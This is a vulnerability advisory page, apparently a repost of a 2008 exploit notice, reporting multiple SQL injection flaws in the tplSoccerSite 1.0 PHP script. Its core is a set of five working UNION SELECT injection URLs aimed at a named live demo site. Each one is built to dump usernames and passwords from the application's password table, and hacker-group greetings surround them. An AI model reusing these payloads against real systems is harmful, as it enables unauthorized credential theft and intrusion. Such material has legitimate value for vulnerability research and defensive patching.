tplSoccerSite 1.0 Multiple Remote SQL Injection Vulnerabilities

2008.07.23
Credit: Mr.SQL
Risk: High
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

############################################################### #################### Viva IslaM Viva IslaM #################### ## ## Remote SQL injection Vulnerability ## ## tplSoccerSite 1.0 ( player.php id ) ## ############################################################### ############################################################### ## ## AuTh0r : Mr.SQL ## ## H0ME : WwW.PaL-HaCkEr.CoM && WwW.AtsDp.CoM/f ## ## Email : SQL@Hotmail.it ## ## SYRiAN Arab HACkErS ######################## ######################## ## ## -[[: L!VE DEMO :]]- ## ## 1) www.tpl-design.com/tplsoccersite/tampereunited/index.php?id=-1'+UNION+SELECT+0,CONCAT_WS(0x3a,PasswordUser,PasswordPassword)MrSQL,current_user,0,0+FROM+tplss_passwords/* ## 2) www.tpl-design.com/tplsoccersite/tampereunited/player.php?id=-1'+UNION+SELECT+0,0,CONCAT_WS(0x3a,PasswordUser,PasswordPassword),'MrSQL',0,0,0,0,0,0,0+FROM+tplss_passwords/* ## 3) www.tpl-design.com/tplsoccersite/tampereunited/opponent.php?opp=-1'+UNION+SELECT+CONCAT_WS(0x3a,PasswordUser,PasswordPassword),'MrSQL',0,0+FROM+tplss_passwords/* ## 4) www.tpl-design.com/tplsoccersite/tampereunited/matchdetails.php?id=-1'+UNION+SELECT+0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,CONCAT_WS(0x3a,PasswordUser,PasswordPassword),0,0,0,0,0+FROM+tplss_passwords/* ## 5) www.tpl-design.com/tplsoccersite/tampereunited/additionalpage.php?id=-1'+UNION+SELECT+CONCAT_WS(0x3a,PasswordUser,PasswordPassword),'MrSQL',0+FROM+tplss_passwords/* ## ######################## ######################## -[[ NOTE ]]- 1 ) Download [[ tplSoccerSite 1.0 ]] http://www.tpl-design.com/download/tpl_ss_10_free.zip ####################################################################################################### ####################################################################################################### -(:: !Gr3E3E3E3E3E3E3TzZ! ::)- :: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: milw0rm :: MuslimS HaCkErS :: ####################################################################################################### #######################################################################################################

References:

http://www.securityfocus.com/bid/30260
http://www.frsirt.com/english/advisories/2008/2121/references
http://tpl-design.com/index.php
http://xforce.iss.net/xforce/xfdb/43849
http://www.milw0rm.com/exploits/6088
http://secunia.com/advisories/31111


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top